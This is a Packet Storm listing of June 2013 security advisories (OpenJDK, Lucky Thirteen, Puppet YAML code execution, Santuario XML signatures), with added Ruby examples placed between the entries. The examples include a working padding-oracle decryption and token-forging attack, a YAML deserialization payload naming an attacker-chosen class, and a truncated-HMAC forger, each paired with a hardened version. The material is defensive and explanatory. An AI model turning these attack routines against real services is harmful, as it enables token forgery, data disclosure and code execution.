
Files

RSA BSAFE SSL-C SSL/TLS Plaintext Recovery
Posted Jun 20, 2013
Site emc.com

RSA BSAFE SSL-C version 2.8.7 contains a patch that is designed to help ensure that MAC checking is time invariant in servers in order to mitigate Lucky Thirteen attacks.

tags | advisory
advisories | CVE-2013-0169
SHA-256 | 3705ff404e79e528a1d4c4f3b3ef61d1564a3c5b98e8c1e65707ec6fa9ccf3b9
Red Hat Security Advisory 2013-0958-01
Posted Jun 20, 2013
Authored by Red Hat | Site access.redhat.com

Red Hat Security Advisory 2013-0958-01 - These packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Software Development Kit. Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption. Integer overflow flaws were found in the way AWT processed certain input. An attacker could use these flaws to execute arbitrary code with the privileges of the user running an untrusted Java applet or application.

tags | advisory, java, overflow, arbitrary
systems | linux, redhat
advisories | CVE-2013-1500, CVE-2013-1571, CVE-2013-2407, CVE-2013-2412, CVE-2013-2443, CVE-2013-2444, CVE-2013-2445, CVE-2013-2446, CVE-2013-2447, CVE-2013-2448, CVE-2013-2449, CVE-2013-2450, CVE-2013-2452, CVE-2013-2453, CVE-2013-2454, CVE-2013-2455, CVE-2013-2456, CVE-2013-2457, CVE-2013-2458, CVE-2013-2459, CVE-2013-2460, CVE-2013-2461, CVE-2013-2463, CVE-2013-2465, CVE-2013-2469, CVE-2013-2470, CVE-2013-2471, CVE-2013-2472
SHA-256 | 3f77eaf4516bbe12c6edbe2aca993604898a19cfaad97a69e04c200768338d2b
Red Hat Security Advisory 2013-0957-01
Posted Jun 20, 2013
Authored by Red Hat | Site access.redhat.com

Red Hat Security Advisory 2013-0957-01 - These packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Software Development Kit. Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption. Integer overflow flaws were found in the way AWT processed certain input. An attacker could use these flaws to execute arbitrary code with the privileges of the user running an untrusted Java applet or application.

tags | advisory, java, overflow, arbitrary
systems | linux, redhat
advisories | CVE-2013-1500, CVE-2013-1571, CVE-2013-2407, CVE-2013-2412, CVE-2013-2443, CVE-2013-2444, CVE-2013-2445, CVE-2013-2446, CVE-2013-2447, CVE-2013-2448, CVE-2013-2449, CVE-2013-2450, CVE-2013-2452, CVE-2013-2453, CVE-2013-2454, CVE-2013-2455, CVE-2013-2456, CVE-2013-2457, CVE-2013-2458, CVE-2013-2459, CVE-2013-2460, CVE-2013-2461, CVE-2013-2463, CVE-2013-2465, CVE-2013-2469, CVE-2013-2470, CVE-2013-2471, CVE-2013-2472
SHA-256 | 607e92095834e27b38b0876edb3515b60809151352fdfe7243f233f859b32927
Debian Security Advisory 2712-1
Posted Jun 20, 2013
Authored by Debian | Site debian.org

Debian Linux Security Advisory 2712-1 - It was discovered that users with a valid agent login in OTRS could use crafted URLs to bypass access control restrictions and read tickets to which they should not have access.

tags | advisory
systems | linux, debian
advisories | CVE-2013-4088
SHA-256 | 504cb290f51c608d9200e113c25d5724ba25dd33673d69731fea9e871839de69
Debian Security Advisory 2711-1
Posted Jun 20, 2013
Authored by Debian | Site debian.org

Debian Linux Security Advisory 2711-1 - Multiple security issues have been found in HAProxy, a load-balancing reverse proxy.

tags | advisory
systems | linux, debian
advisories | CVE-2012-2942, CVE-2013-1912, CVE-2013-2175
SHA-256 | 319b470e413067c6dfb06e38f3db14e6a31e3cdbf1d418eaedc13bc17f95e217
Drupal Login Security 6.x / 7.x DoS / Bypass
Posted Jun 19, 2013
Authored by Heine Deelstra, David Stoline | Site drupal.org

Drupal Login Security third party module versions 6.x and 7.x suffer from bypass and denial of service vulnerabilities.

tags | advisory, denial of service, vulnerability
SHA-256 | 598061f54bac357e4a742401275a6a32cd65fb79938c18d3b4947c9e8cce8cc3
IBM WebSphere Commerce Padding Oracle Attacks
Posted Jun 19, 2013
Authored by George D. Gal, Timothy D. Morgan | Site vsecurity.com

In February 2013, VSR identified a vulnerability in the IBM WebSphere Commerce framework which could allow an attacker to tamper with values stored in the "krypto" URL parameter. This parameter is encrypted with a block cipher without any independent integrity protection. This, combined with observed application behavior, allows for padding oracle attacks which can be used to decrypt the krypto token and forge new tokens with arbitrary embedded parameters.

tags | advisory, arbitrary
advisories | CVE-2013-0523
SHA-256 | 5998d6a975a57dc3921286cababdc5aa780a65141183d9726f3d8938c1392707
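The attack VSR describes above, as an added worked example rather than anything from the advisory or IBM's code: a token encrypted with AES-128-CBC under PKCS#7 padding but carrying no MAC (the cipher, the padding scheme and the userId/role contents are assumptions; the page says only that a block cipher is used without integrity protection), an oracle that reveals nothing except whether the padding was valid, and an attacker who first decrypts the token and then forges one with chosen parameters using that oracle alone.

```ruby
require 'openssl'

BLOCK = 16
KEY = OpenSSL::Random.random_bytes(16)   # server secret; the attacker never sees it

def xor_bytes(a, b)
  a.bytes.zip(b.bytes).map { |x, y| x ^ y }.pack('C*')
end

def split_blocks(s)
  (0...s.bytesize).step(BLOCK).map { |i| s.byteslice(i, BLOCK) }
end

# --- Server side. AES-CBC with PKCS#7 padding and no MAC (assumed scheme):
# secrecy of the key is all that guards the token's integrity.
def encrypt_token(key, plaintext)
  c = OpenSSL::Cipher.new('aes-128-cbc')
  c.encrypt
  c.key = key
  iv = c.random_iv
  iv + c.update(plaintext) + c.final
end

def decrypt_token(key, token)
  c = OpenSSL::Cipher.new('aes-128-cbc')
  c.decrypt
  c.key = key
  c.iv = token.byteslice(0, BLOCK)
  c.update(token.byteslice(BLOCK, token.bytesize - BLOCK)) + c.final  # CipherError on bad padding
end

# The oracle: the application reacts differently to bad padding (a distinct
# error page, status code or delay); here that is reduced to true/false.
class PaddingOracle
  attr_reader :queries

  def initialize(key)
    @key = key
    @queries = 0
  end

  def valid?(token)
    @queries += 1
    decrypt_token(@key, token)
    true
  rescue OpenSSL::Cipher::CipherError
    false
  end
end

# --- Attacker side. Recover D_k(target) one byte at a time, last byte first,
# by placing a crafted block in front of it and asking only about padding.
def recover_intermediate(oracle, target)
  inter = Array.new(BLOCK, 0)
  (BLOCK - 1).downto(0) do |pos|
    pad = BLOCK - pos
    hit = (0..255).find do |guess|
      forged = Array.new(BLOCK, 0)
      ((pos + 1)...BLOCK).each { |j| forged[j] = inter[j] ^ pad }
      forged[pos] = guess
      next false unless oracle.valid?(forged.pack('C*') + target)
      if pos == BLOCK - 1
        # A hit on the last byte may be an accidental 0x02 0x02 rather than
        # 0x01; disturbing the byte before it tells the two apart.
        forged[pos - 1] ^= 0x01
        next false unless oracle.valid?(forged.pack('C*') + target)
      end
      true
    end
    raise "oracle never accepted byte #{pos}" if hit.nil?
    inter[pos] = hit ^ pad
  end
  inter.pack('C*')
end

def oracle_decrypt(oracle, token)
  blocks = split_blocks(token)
  plain = blocks.each_cons(2).map { |prev, cur| xor_bytes(recover_intermediate(oracle, cur), prev) }.join
  plain.byteslice(0, plain.bytesize - plain.getbyte(-1))   # strip PKCS#7 padding
end

# Forge a token for chosen plaintext without the key: pick the last ciphertext
# block freely, then work backwards; each earlier block is D_k(next) XOR plaintext.
def oracle_forge(oracle, plaintext)
  n = BLOCK - plaintext.bytesize % BLOCK
  padded = plaintext.b + ([n] * n).pack('C*')
  out = [("\x00" * BLOCK).b]
  split_blocks(padded).reverse_each { |p| out << xor_bytes(recover_intermediate(oracle, out.last), p) }
  out.reverse.join
end

if __FILE__ == $0
  oracle = PaddingOracle.new(KEY)
  token = encrypt_token(KEY, 'userId=1001&role=user')      # constructed sample token
  puts "recovered: #{oracle_decrypt(oracle, token)}"
  forged = oracle_forge(oracle, 'userId=1&role=admin')
  puts "forged token decrypts to: #{decrypt_token(KEY, forged)} (#{oracle.queries} oracle queries)"
end
```

The query counter is the number to watch: a block costs on the order of 16 x 128 oracle calls, which is cheap even across a slow network. The fix is to authenticate the ciphertext (an HMAC over IV and ciphertext checked before decryption, or an AEAD mode) so that padding validity is never observable to the client.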
RSA BSAFE SSL-J BEAST / Lucky Thirteen
Posted Jun 19, 2013
Site emc.com

RSA BSAFE SSL-J 6.0.1 and 5.1.2 contain updates designed to prevent BEAST attacks and SSL/TLS Plaintext Recovery (aka Lucky Thirteen) attacks.

tags | advisory
advisories | CVE-2013-0169, CVE-2011-3389
SHA-256 | c4c500343555b143f39e0055e4ce990a4e2809cae8e525b10d41140c0a9e374e
RSA BSAFE SSL/TLS Plaintext Recovery
Posted Jun 19, 2013
Site emc.com

Researchers have discovered a weakness in the handling of CBC cipher suites in SSL, TLS and DTLS in all versions of RSA BSAFE Micro Edition Suite other than 4.0.3 and 3.2.5. The Lucky Thirteen attack exploits timing differences arising during MAC processing. Vulnerable implementations do not properly consider timing side-channel attacks on the MAC check while processing malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue.

tags | advisory, remote
advisories | CVE-2013-0169
SHA-256 | 63d67971616d756f9a24527aece917f871801037a08e76de35be02323baa702a
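What the "time invariant MAC checking" in the BSAFE SSL-C entry above means in code, as an added example that is not RSA's or any TLS stack's code: the record body that CBC decryption yields, a check that returns early on bad padding and hashes an amount of data that depends on the padding length, and a hardened check that removes both leaks. HMAC-SHA1 and 16-byte blocks match the *_CBC_SHA suites; the second return value counts the bytes fed to the hash so the difference is visible without timing anything. Shipping implementations go further and equalise the number of hash compression-function calls rather than just bytes, since SHA-1 consumes input in 64-byte blocks; this sketch keeps the byte count constant and treats bad padding as a zero-length pad, as TLS 1.1 and later recommend.

```ruby
require 'openssl'

MAC_LEN = 20   # HMAC-SHA1, as in the TLS 1.x *_CBC_SHA cipher suites

def hmac_sha1(key, data)
  OpenSSL::HMAC.digest(OpenSSL::Digest.new('SHA1'), key, data)
end

def constant_time_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Build what CBC decryption of a record yields: data || MAC || padding.
# TLS padding is (padlen + 1) bytes, every one of them equal to padlen.
def build_record(key, data, block = 16)
  body = data.b + hmac_sha1(key, data)
  padlen = block - (body.bytesize + 1) % block
  body + ([padlen] * (padlen + 1)).pack('C*')
end

# Vulnerable: bails out on bad padding before touching the MAC, and when it
# does MAC, hashes an amount of data that depends on padlen. Both leak.
# Returns [accepted, bytes_hashed].
def check_record_naive(key, record)
  padlen = record.getbyte(-1)
  return [false, 0] if padlen + 1 + MAC_LEN > record.bytesize
  pad = record.byteslice(-(padlen + 1), padlen + 1)
  return [false, 0] unless pad.bytes.all? { |b| b == padlen }
  body = record.byteslice(0, record.bytesize - padlen - 1)
  data = body.byteslice(0, body.bytesize - MAC_LEN)
  tag  = body.byteslice(-MAC_LEN, MAC_LEN)
  [hmac_sha1(key, data) == tag, data.bytesize]
end

# Hardened: no early exit, bad padding becomes a zero-length pad and the
# record is still MACed, the bytes fed to the hash never depend on padlen,
# and the tag compare is constant-time.
def check_record_hardened(key, record)
  padlen = record.getbyte(-1)
  bad = (padlen + 1 + MAC_LEN > record.bytesize) ? 1 : 0
  # Scan a fixed 255-byte window; the loop bound never depends on padlen.
  (1..255).each do |i|
    in_pad = (i <= padlen && i < record.bytesize) ? 1 : 0
    b = i < record.bytesize ? record.getbyte(-1 - i) : padlen
    bad |= in_pad & ((b != padlen) ? 1 : 0)
  end
  padlen = 0 if bad == 1
  data_len = record.bytesize - MAC_LEN - 1 - padlen
  data = record.byteslice(0, data_len)
  tag  = record.byteslice(data_len, MAC_LEN)
  expected = hmac_sha1(key, data)
  # Dummy MAC over the bytes the padding removed, so every record of this
  # length costs the same hashing work whatever padlen claims.
  hmac_sha1(key, record.byteslice(record.bytesize - 1 - padlen, padlen))
  [constant_time_equal?(expected, tag) && bad == 0, data_len + padlen]
end

if __FILE__ == $0
  key = 'k' * 20                                          # constructed MAC key
  rec = build_record(key, "GET / HTTP/1.1\r\n")
  bad_pad = rec.byteslice(0, rec.bytesize - 1) + [rec.getbyte(-1) ^ 0xff].pack('C*')
  puts "naive    good=#{check_record_naive(key, rec).inspect} bad=#{check_record_naive(key, bad_pad).inspect}"
  puts "hardened good=#{check_record_hardened(key, rec).inspect} bad=#{check_record_hardened(key, bad_pad).inspect}"
end
```

With the naive check, a record with bad padding costs zero hash work and a record with good padding costs the full MAC; the attacker's statistics are built on exactly that gap. With the hardened check the work is identical for bad padding, bad MAC and a clean record.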
Technical Cyber Security Alert 2013-169A
Posted Jun 19, 2013
Authored by US-CERT | Site us-cert.gov

Technical Cyber Security Alert 2013-169A - Oracle released the June 2013 Critical Patch Update for Oracle Java SE. This patch contains 40 new security fixes across Java SE products and a fix to the Javadoc Tool. API documentation in HTML format generated by the Javadoc tool that contains a right frame may be vulnerable to frame injection when hosted on a web server.

tags | advisory, java, web
SHA-256 | a41aca8835ee3499199ea44a2b84c6181c92e3efce36d2da65f6daf2fd76c218
Facebook Permanent Photo URIs
Posted Jun 19, 2013
Authored by Joel Shoe

Facebook appears to suffer from a critical design flaw in how users share photos using a URI. Once a URI is known, the only action the user can take to hide the contents of a photo album is to delete the album. This means that after any breach, whether someone sits down at your computer or obtains your Facebook password, you must delete all your photo albums to keep their contents private.

tags | advisory, info disclosure
SHA-256 | 0a29cfeb80463cd152ef5b3f1d86ba9355c1a6664476d861f177f8a3a82b52fa
Debian Security Advisory 2628-2
Posted Jun 19, 2013
Authored by Debian | Site debian.org

Debian Linux Security Advisory 2628-2 - The security update DSA-2628 for nss-pam-ldapd failed to build on kfreebsd-amd64 and kfreebsd-i386.

tags | advisory
systems | linux, debian
advisories | CVE-2013-0288
SHA-256 | ca04431f7098338d92f01c30b2b14d94f107aed5b83c0e5d0a566ae308c1550a
Debian Security Advisory 2698-1
Posted Jun 19, 2013
Authored by Debian | Site debian.org

Debian Linux Security Advisory 2698-1 - Multiple issues were discovered in the TIFF tools, a set of utilities for TIFF image file manipulation and conversion.

tags | advisory
systems | linux, debian
advisories | CVE-2013-1960, CVE-2013-1961
SHA-256 | 2d2368ecc0f7d48d6b7d6ddde98b2ad8db9e4da5cfa9209da669bc81c6a219db
Ubuntu Security Notice USN-1886-1
Posted Jun 19, 2013
Authored by Ubuntu | Site security.ubuntu.com

Ubuntu Security Notice 1886-1 - It was discovered that Puppet incorrectly handled YAML payloads. An attacker on an untrusted client could use this issue to execute arbitrary code on the master.

tags | advisory, arbitrary
systems | linux, ubuntu
advisories | CVE-2013-3567
SHA-256 | eb685b156838671fe79b419fa87ca1d86032de2006cbe1d74ccf0cf26603bd9e
Puppet Remote Code Execution
Posted Jun 19, 2013
Authored by Ben Murphy

When making REST API calls, the puppet master takes YAML from an untrusted client, deserializes it, and then calls methods on the resulting object. A YAML payload can be crafted to cause the deserialization to construct an instance of any class available in the ruby process, which allows an attacker to execute code contained in the payload.

tags | advisory, ruby
advisories | CVE-2013-3567
SHA-256 | 4331f8a7741c008aa390b37694c2381491f1dd083ba0a9941ebaf7a62f36e8ac
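The unsafe and safe ends of the deserialization described in the two Puppet entries above, as an added example that is not Puppet's code: a stand-in Report class the master expects, a stand-in Gadget class standing for "any class available in the ruby process" (it only records that it was reached), a constructed request body whose YAML tag names Gadget, and the two handlers. Psych 4 (Ruby 3.1) changed YAML.load to be safe by default and moved the old behaviour to YAML.unsafe_load; the fallback covers older versions, where YAML.load itself is the unsafe path.

```ruby
require 'yaml'

# The class the master legitimately expects in a report body (constructed stand-in).
class Report
  attr_accessor :host, :status

  def summary
    "#{host}: #{status}"
  end
end

# Stand-in for "any class available in the ruby process": the client picks it,
# and whatever method the master calls next dispatches to it. This one only
# records that it ran.
class Gadget
  attr_accessor :cmd

  def summary
    "Gadget#summary reached with cmd=#{cmd.inspect}"
  end
end

# Constructed untrusted request bodies; the tag decides which class is built.
EVIL_YAML = <<~DOC
  --- !ruby/object:Gadget
  cmd: id
DOC

GOOD_YAML = <<~DOC
  --- !ruby/object:Report
  host: web01
  status: changed
DOC

# Vulnerable: a full YAML load instantiates whatever class the document names,
# then the handler calls a method on it without looking at what it got.
def handle_report_vulnerable(body)
  obj = YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(body) : YAML.load(body)
  obj.summary
end

# Fixed: only an explicit allow-list of classes may be constructed, and the
# result is type-checked before any method is called on it.
def handle_report_safe(body)
  obj = YAML.safe_load(body, permitted_classes: [Report])
  raise ArgumentError, "expected Report, got #{obj.class}" unless obj.is_a?(Report)
  obj.summary
end

if __FILE__ == $0
  puts handle_report_vulnerable(GOOD_YAML)
  puts handle_report_vulnerable(EVIL_YAML)   # attacker-chosen class reached
  puts handle_report_safe(GOOD_YAML)
  begin
    handle_report_safe(EVIL_YAML)
  rescue Psych::DisallowedClass => e
    puts "rejected: #{e.message}"
  end
end
```

The allow-list is the whole fix; the is_a? check after it is cheap insurance against a permitted class being reused in a way the handler did not expect.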
FreeBSD Security Advisory - mmap Privilege Escalation
Posted Jun 18, 2013
Site security.freebsd.org

FreeBSD Security Advisory - Due to insufficient permission checks in the virtual memory system, a tracing process (such as a debugger) may be able to modify portions of the traced process's address space to which the traced process itself does not have write access. This error can be exploited to allow unauthorized modification of an arbitrary file to which the attacker has read access, but not write access. Depending on the file and the nature of the modifications, this can result in privilege escalation. To exploit this vulnerability, an attacker must be able to run arbitrary code with user privileges on the target system.

tags | advisory, arbitrary
systems | freebsd
advisories | CVE-2013-2171
SHA-256 | 46c9d0684ffdd8c4787e60e14015a9e757b66b443d2622296e77fbdbc855860a
Apache Santuario XML Security For C++ Signature Bypass
Posted Jun 18, 2013
Authored by James Forshaw

The implementation of XML digital signatures in the Santuario-C++ library is vulnerable to a spoofing issue allowing an attacker to reuse existing signatures with arbitrary content. The vulnerability affects only applications that do not perform proper checking/analysis of the content of the Reference elements in the Signature, but the bug exacerbates this problem by opening such applications to attacks using arbitrary content, instead of just attacks involving malicious, but signed, content. Versions prior to 1.7.1 are affected.

tags | advisory, arbitrary, spoof
advisories | CVE-2013-2153
SHA-256 | f4cc52eebffe98291d0852b7719520ff57e20f3844e5293b69e302a109d1c520
Technical Cyber Security Alert 2013-168A
Posted Jun 18, 2013
Authored by US-CERT | Site us-cert.gov

Technical Cyber Security Alert 2013-168A - Select Microsoft software products contain multiple vulnerabilities. Microsoft has released updates to address these vulnerabilities.

tags | advisory, vulnerability
SHA-256 | cf7f30c9457212d92f6b62a38f0d54e3832e152a6b96e1732817a0a55735ef2c
Ubuntu Security Notice USN-1884-1
Posted Jun 18, 2013
Authored by Ubuntu | Site security.ubuntu.com

Ubuntu Security Notice 1884-1 - It was discovered that LibRaw incorrectly handled broken full-color images. If a user or automated system were tricked into processing a specially crafted raw image, applications linked against LibRaw could be made to crash, resulting in a denial of service, or possibly execute arbitrary code.

tags | advisory, denial of service, arbitrary
systems | linux, ubuntu
advisories | CVE-2013-2126
SHA-256 | af2f3c18279a4d4ad6d10e905a3caf640120ee29feebb1726755729b0ffba8bd
Ubuntu Security Notice USN-1885-1
Posted Jun 18, 2013
Authored by Ubuntu | Site security.ubuntu.com

Ubuntu Security Notice 1885-1 - It was discovered that libKDcraw incorrectly handled broken full-color images. If a user or automated system were tricked into processing a specially crafted raw image, applications linked against libKDcraw could be made to crash, resulting in a denial of service, or possibly execute arbitrary code.

tags | advisory, denial of service, arbitrary
systems | linux, ubuntu
advisories | CVE-2013-2126
SHA-256 | 745dd16e66aaa77d962d55ef226b8a36fe3d76733bda43245338ea5d58832c7a
Debian Security Advisory 2710-1
Posted Jun 18, 2013
Authored by Debian | Site debian.org

Debian Linux Security Advisory 2710-1 - James Forshaw from Context Information Security discovered several vulnerabilities in xml-security-c, an implementation of the XML Digital Security specification.

tags | advisory, vulnerability
systems | linux, debian
advisories | CVE-2013-2153, CVE-2013-2154, CVE-2013-2155, CVE-2013-2156
SHA-256 | 9115a6092e44a563c15e997a4b11c3f9292f19c14422c4354bf87e64e409defa
Red Hat Security Advisory 2013-0953-01
Posted Jun 18, 2013
Authored by Red Hat | Site access.redhat.com

Red Hat Security Advisory 2013-0953-01 - Red Hat JBoss Portal is the open source implementation of the Java EE suite of services and Portal services running atop Red Hat JBoss Enterprise Application Platform. JBoss Web Services leaked side-channel data when distributing symmetric keys, allowing a remote attacker to recover the entire plain text form of a symmetric key. Spring framework could possibly evaluate Expression Language expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server.

tags | advisory, java, remote, web, arbitrary
systems | linux, redhat
advisories | CVE-2011-2487, CVE-2011-2730, CVE-2012-5575
SHA-256 | 4f9e2960fda4e62a5f6b93721a0f7321b3180fe0d9a8f7f628aa10ee6222b1c2
Apple Security Advisory 2013-06-18-1
Posted Jun 18, 2013
Authored by Apple | Site apple.com

Apple Security Advisory 2013-06-18-1 - Java for OS X 2013-004 and Mac OS X v10.6 Update 16 are now available and address multiple vulnerabilities that include arbitrary code execution issues.

tags | advisory, java, arbitrary, vulnerability, code execution
systems | apple, osx
advisories | CVE-2013-1500, CVE-2013-1571, CVE-2013-2407, CVE-2013-2412, CVE-2013-2437, CVE-2013-2442, CVE-2013-2443, CVE-2013-2444, CVE-2013-2445, CVE-2013-2446, CVE-2013-2447, CVE-2013-2448, CVE-2013-2450, CVE-2013-2451, CVE-2013-2452, CVE-2013-2453, CVE-2013-2454, CVE-2013-2455, CVE-2013-2456, CVE-2013-2457, CVE-2013-2459, CVE-2013-2461, CVE-2013-2463, CVE-2013-2464, CVE-2013-2465, CVE-2013-2466, CVE-2013-2468
SHA-256 | f8e9f7d76bd910c50d277b999c12859be24a831c1a38b126a92577609223f014
Apache Santuario XML Security For C++ Heap Overflow
Posted Jun 18, 2013
Authored by James Forshaw

A heap overflow exists in the processing of the PrefixList attribute optionally used in conjunction with Exclusive Canonicalization, potentially allowing arbitrary code execution. If verification of the signature occurs prior to actual evaluation of a signing key, this could be exploited by an unauthenticated attacker. Apache Santuario XML Security for C++ library versions prior to 1.7.1 are affected.

tags | advisory, overflow, arbitrary, code execution
advisories | CVE-2013-2156
SHA-256 | 8d2ae10fa63742af710c4959f5b09bc760cf1e6de68ca6c11e5d303b15106ce4
Apache Santuario XML Security For C++ Denial Of Service / Bypass
Posted Jun 18, 2013
Authored by James Forshaw

A bug exists in the processing of the output length of an HMAC-based XML Signature that would cause a denial of service when processing specially chosen input. Exploitation of this issue does not require authenticated content. In very unusual cases, inputs could be chosen in such a way that the fix for the issue in CVE-2009-0217 could be bypassed, enabling improper verification of a signature. Versions prior to 1.7.1 are affected.

tags | advisory, denial of service
advisories | CVE-2013-2155
SHA-256 | 4ed699c9710bffc9e07a34e7f30bd97e55b2305af63662dc2f499d685d727662
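The HMACOutputLength rule that the CVE-2009-0217 fix introduced, and that the entry above says can be bypassed in unusual cases, as an added example that is not Santuario's code: a verifier that honours any requested truncation next to one that enforces RFC 2104's floor of max(80, digest length / 2) bits, and a keyless forger that simply enumerates tags of the requested length. The digest names, the key and the signed data are constructed for the example.

```ruby
require 'openssl'

DIGEST_BITS = { 'SHA1' => 160, 'SHA256' => 256 }.freeze
KEY = OpenSSL::Random.random_bytes(32)    # shared secret; the forger never sees it

# HMAC over the data, truncated to its first `bits` bits (HMACOutputLength
# semantics), returned as a string of '0'/'1' characters.
def hmac_bits(digest, key, data, bits)
  mac = OpenSSL::HMAC.digest(OpenSSL::Digest.new(digest), key, data)
  mac.unpack('B*')[0][0, bits]
end

def constant_time_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Vulnerable: honours whatever HMACOutputLength the signature element asks for.
def verify_naive(digest, key, data, sig_bits, output_length)
  constant_time_equal?(hmac_bits(digest, key, data, output_length), sig_bits)
end

# RFC 2104's truncation rule, which the CVE-2009-0217 fix enforces: a truncated
# HMAC keeps at least half the digest and never fewer than 80 bits.
def acceptable_output_length?(digest, output_length)
  full = DIGEST_BITS.fetch(digest)
  output_length >= [80, full / 2].max && output_length <= full
end

def verify_hardened(digest, key, data, sig_bits, output_length)
  return false unless acceptable_output_length?(digest, output_length)
  constant_time_equal?(hmac_bits(digest, key, data, output_length), sig_bits)
end

# Forger: no key, but free to choose HMACOutputLength. Tries every tag of that
# length; returns [accepted_tag, attempts] or nil if nothing was accepted.
def forge_truncated(verifier, data, output_length)
  (0...(1 << output_length)).each do |v|
    candidate = v.to_s(2).rjust(output_length, '0')
    return [candidate, v + 1] if verifier.call(data, candidate, output_length)
  end
  nil
end

if __FILE__ == $0
  data = '<Reference URI="#order">...</Reference>'    # constructed signed content
  naive = ->(d, s, l) { verify_naive('SHA256', KEY, d, s, l) }
  hardened = ->(d, s, l) { verify_hardened('SHA256', KEY, d, s, l) }
  p forge_truncated(naive, data, 8)      # accepted within 256 attempts
  p forge_truncated(hardened, data, 8)   # nil: the length is refused before any compare
end
```

An 8-bit HMACOutputLength turns the signature into a 1-in-256 guess; the errata floor makes the smallest permitted tag 128 bits for HMAC-SHA256, far beyond enumeration. Whichever way the length is parsed, the check has to run before the comparison, which is the spot the 2013 bug lands in.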
© 2022 Packet Storm. All rights reserved.
